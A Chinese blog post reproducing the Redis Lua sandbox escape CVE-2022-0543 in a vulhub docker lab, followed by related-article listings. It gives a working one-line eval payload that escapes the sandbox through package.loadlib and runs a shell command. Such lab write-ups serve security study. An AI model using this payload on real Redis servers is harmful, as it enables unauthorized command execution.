Redis Lua沙箱绕过RCE(CVE-2022-0543)复现

已于 2023-10-25 15:36:01 修改
阅读量2.4k 收藏 5
点赞数
分类专栏: 渗透测试 文章标签: redis lua 数据库
于 2022-03-16 17:23:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/123531411
版权

漏洞介绍

Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

影响版本

2.2 <= redis < 5.0.13
2.2 <= redis < 6.0.15
2.2 <= redis < 6.2.5

漏洞复现

环境搭建

更新vulhub

git pull

在这里插入图片描述

启动漏洞环境

docker-compose up -d

在这里插入图片描述

漏洞利用

安装redis-cli工具

apt-get update
apt-get install redis-server

在这里插入图片描述

使用redis-cli工具连接redis数据库

redis-cli -h 127.0.0.1 -p 6799

在这里插入图片描述

发送恶意代码,可以看到回显数据为执行命令id的内容

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

在这里插入图片描述

修复建议

更新至最新版本

【牛角尖扎人,都不如刀子嘴戳人来得厉害】

3tefanie丶zhou
关注
专栏目录
CVE-2022-38817
初岄的博客
10-12 2173
Dapr Dashboard 存在 未授权访问漏洞,在未经授权的情况下获取云上redis、mongodb、rabbitmq等应用的明文配置信息,并可以进一步利用这些配置信息获取云上的敏感数据。
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 4633
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
CVE-2022-0543lua沙盒绕过命令执行)复现
kriesa的博客
07-13 595
CVE-2022-0543复现
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Foreverlove112的博客
09-22 547
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Redis Lua沙盒绕过RCECVE-2022-0543
最新发布
qq_57163799的博客
08-19 556
覆盖面极广的Redis未授权漏洞利用方式——全版本通用!!!
Redis Lua沙盒绕过命令执行(CVE-2022-0543
swordheart的博客
06-23 434
漏洞原理介绍Redis 是一个开源(BSD 许可)的内存数据结构存储,用作数据库、缓存和消息代理。Redis 是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。在 Ubuntu 发行版打包中,不慎在 Lua 沙箱中重新分发一个箱对象,攻击利用这个对象的加载动态库,可以使用从 liblua 加载模块,然后使用此模块执行任意命令;参考链接:漏洞版本 漏洞环境执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器docker-compose up -d服务启动后,我
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
qq_50854662的博客
01-05 394
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
CVE-2022-0543 Redis沙盒逃逸漏洞复现(CVE-2022-0543)
XZ_______的博客
04-21 1236
漏洞复现
Reids RCE-CVE-2022-0543 复现
weixin_52532634的博客
02-02 390
local f = io.popen("在这里命令", "r");编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问。一般都是默认的端口好6379,这里端口号是环境映射的。
CVE-2021-3129漏洞复现-kali2020.4
weixin_43867542的博客
07-19 1677
漏洞名称:Facade Ignition for Laravel 授权问题漏洞 等级危害:超危 CVSS评分: 漏洞类型:授权问题 漏洞概述 Facade Ignition for Laravel是比利时Facade公司的一款运行在Laravel Web框架中的可自定义的错误页面。 Ignition for Laravel 2.5.2之前版本存在授权问题漏洞,该漏洞源于程序未进行正确的身份验证,攻击者可利用该漏洞执行任意代码。 受影响版本 Laravel <= 8.4.2;Igni
CVE-2022-0543redis沙盒逃逸)详细漏洞复现
没事我溜达
03-25 8829
参考:vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua沙盒绕过命令执行(CVE-2022-0543Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 直接写复现全过程吧
CVE-2022-0543
sinat_25635183的博客
03-25 380
2、CVE-2022-0543Redis沙盒逃逸漏洞,Redis Labs 是一家专注于 Redis 数据库的企业公司,提供企业级的 Redis 产品和服务。出现一个新的网页,直接跳转到iana的官网(IANA(Internet Assigned Numbers Authority)是互联网分配号码局,是负责管理全球互联网协议参数的权威组织之一。根据前面的增加链接内容的操作,可以尝试一下将iana网站的链接加在靶场链接的后面。注意:每个人可能打开的网页链接不一样,需要根据自己的情况来操作后面的步骤。
Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 1958
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
Redis Lua沙盒绕过-命令执行漏洞复现-CVE-2022-0543
apple_52661176的博客
08-30 341
Debian和Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令;要利用此漏洞,攻击者需具有执行 eval 命令的权限(攻击者经过认证、或者 Redis 本身未设置鉴权检查)。当redis经过认证、或者 Redis 本身未设置鉴权检查可以直接连接redis服务。使用Another Redis Desktop Manager工具中的redis控制台输入。更改为自己需要的命令。
CVE-2022-0543redis沙盒逃逸)
huayimy的博客
02-03 895
CVE-2022-0543redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
redis lua沙盒绕过
08-14
- *2* [【CVE-2022-0543Redis Lua沙盒绕过命令执行复现](https://blog.csdn.net/weixin_45329947/article/details/123531319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值